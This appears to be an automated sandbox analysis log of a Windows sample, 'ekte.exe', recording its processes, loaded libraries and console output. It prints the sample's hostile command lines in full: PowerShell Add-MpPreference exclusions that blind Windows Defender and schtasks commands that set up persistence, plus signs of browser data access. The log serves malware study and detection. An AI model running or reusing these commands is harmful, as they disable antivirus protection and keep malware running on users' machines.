Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Users\user\Desktop\ekte.exe File created: C:\Users\user\AppData\Local\Temp\tmp47BA.tmp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P............................."..........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n...............................@..........................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................L..........................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........^..........................s..............D..... ....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................j..........................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................|..........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s..............D.....$....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............D.....2....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s....................l....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P........................................................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P........................................................s..............D............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(...............<..........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......M..........................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......`..........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......l..........................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......P..................................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(..........................................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n...............(..........................................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(..........................................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s............(.)..... ....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(..........................................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(..........................................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(..........................................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............(.).....$....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x........ .........................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x........ .........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......& .........................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.).....2....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......D .........................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......W .........................s....................l....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x.......c .........................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.............(.......x.......u .........................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............(.......x........ .........................s............(.)............................. Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................P.......................(.P.....4.......\....................................................................................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P..............................P.........................s..............).............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................P.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P..............................P.........................s..............).............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................Q.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P.............................!Q.........................s..............).............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................-Q.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n...............................?Q.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................KQ.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........]Q.........................s............(....... .......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................iQ.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P.............................{Q.........................s..............).............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................Q.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......Q.........................s............(.......$.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................Q.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P..............................Q.........................s..............).............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................Q.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............(.......2.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................Q.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ..).....................................(.P..............................Q.........................s..............).....l.......(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................R.........................s............(.................).............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P..............................R.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................R.........................s............(...............(...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................N.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P............................."O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................5O.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................AO.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n...............................SO.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P............................._O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........qO.........................s............H....... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................}O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......O.........................s............H.......$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............H.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................O.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................P.........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P..............................P.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.............................%P.........................s............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............................1P.........................s............H...............................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................E.R.R.O.R.:. ...................@........E...................................................................... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................E.R.R.O.(.P.....................@........E..............................................j....................... Jump to behavior
Source: ekte.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ekte.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\ekte.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: findstr.exe, 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: ekte.exe ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\ekte.exe File read: C:\Users\user\Desktop\ekte.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe"
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {F5042694-6DBB-4431-8D77-CD30DFD414D8} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp"
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe"
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe" Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp" Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe" Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe" Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
